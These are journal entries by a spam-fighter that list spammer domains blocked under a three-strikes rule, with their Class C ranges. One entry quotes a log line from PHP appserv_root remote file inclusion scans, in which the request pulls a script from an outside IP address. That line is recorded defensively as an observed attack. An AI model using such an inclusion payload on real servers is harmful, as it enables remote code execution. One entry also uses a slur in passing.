Journal Journal: Today's 3-strikes winner
Here's today's winner:
bluestyles.info
Snowshoe spammer.
Journal Journal: Today's 3-strikes winners
Here's today's winners:
funtousa.info
smart-dns.net
Snowshoe spammer.
Journal Journal: Today's 3-strikes winner
Here's today's winner:
net-ooinf.com
Journal Journal: Today's 3-strikes winners
Here's today's list:
anaboll.com
dockeyel.com
coliza.com
adarabo.com
datergr.com
dumkarr.com
increun.com
circust.com
honeuk.com
dandele.com
ficeme.com
graftsm.com
troutia.com
tuciseas.com
All came from the same Class C, just like a typical snowshoe spammer would, so that's been blocked too.
Journal Journal: Today's 3-strikes winners
Here's today's list:
graftsm.com
tuciseas.com
anaboll.com
coliza.com
troutia.com
Another snowshoe spammer, so the Class C is blocked too.
Journal Journal: Today's 3-strikes winner
Here's today's winner:
iwuzborndizway.info
As if a domain name that retarded needed anything other than being blocked.
Journal Journal: Today's 3-strikes winners
Here's today's list:
mktdns.com
ethreemail.com
Journal Journal: Today's 3-strikes list
Since the takedown of the Rustock botnet total spam volume has dropped but the snowshoe spammers have cranked back up. Here's today's list:
alsopagehim.com
doesnearher.com
evencitynow.com
kindcrabbuu.com
hereheadgo.com
homeopenbe.com
movecarfor.com
nearmetrolike.com
Journal Journal: today's 3-strikes winners
Since the shutdown of the Rustock botnet, total spam volume has dropped but the snowshoe spammers have cranked their operations back up. Here's today's list:
alsopagehim.com
doesnearher.com
evencitynow.com
hereheadgo.com
homeopenbe.com
movecarfor.com
nearmetrolike.com
pagedailybe.com
Journal Journal: pHp vulnerability scans using appserv_root remote inclusion
I've been encountering a lot of appserv_root scans using IP addresses in Turkey as the inclusion file:
2011/4/06 03:05:43 404 (URI not found) Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)
/var/log/httpd/access_log GET /appserv/main.php?appserv_root=http://88.255.225.20/appserv/t.txt? HTTP/1.1
The original requests are coming from Amazon's cloud services, and other "cloud" providers like cloud-ips.com, which doesn't seem to have a Website.
If you call Amazon's whois phone number for the Technical Contact, it's their legal department. They'll never answer, you have to email or fax your request.
I got Josh Odom's personal voicemail when I called the whois Tech # for cloud-ips.com. Left a message, we'll see if he calls back.
Journal Journal: Today's 3-strikes winners
Here's today's list:
cheewecity.com
mebuyhead.com
canheopen.com
weshecar.com
ithavemetro.com
otwedaily.com
doforcrab.com
atlovefood.com
homeyoumuch.com
Snowshoe spammer, so the Class C is blocked too.
Journal Journal: Today's 3-strikes winners
Here's today's winners:
gestiena.info
gonosynt.info
mifuelia.info
lydding.info
joleeti.info
odourat.info
excipli.info
plaforb.info
dinnywo.info
daytilt.info
sourcemediatwenty.info
sourcenowfifteen.info
sourcemedianineteen.info
sourcemediaeighteen.info
sourcebulletinfive.info
mediabulletintwelve.info
sourcebulletinseven.info
sourcebulletinsix.info
websourcethirteen.info
Another round of snowshoe spammers from 2 different Class C's, so they're blocked too.
Journal Journal: Today's 3-strikes winner
Here's today's list:
aurelop.com
Snowshoe spammer, so the whole Class C is blocked too.
Journal Journal: Today's 3-strikes winner
Here's today's winner:
cheapstingybargains.com
Journal Journal: Today's 3-strikes list
Here's today's list:
informationssource.info
biographicbuziness.com
More snowshoe spamming, with SMTP connections coming from several different Class C's.
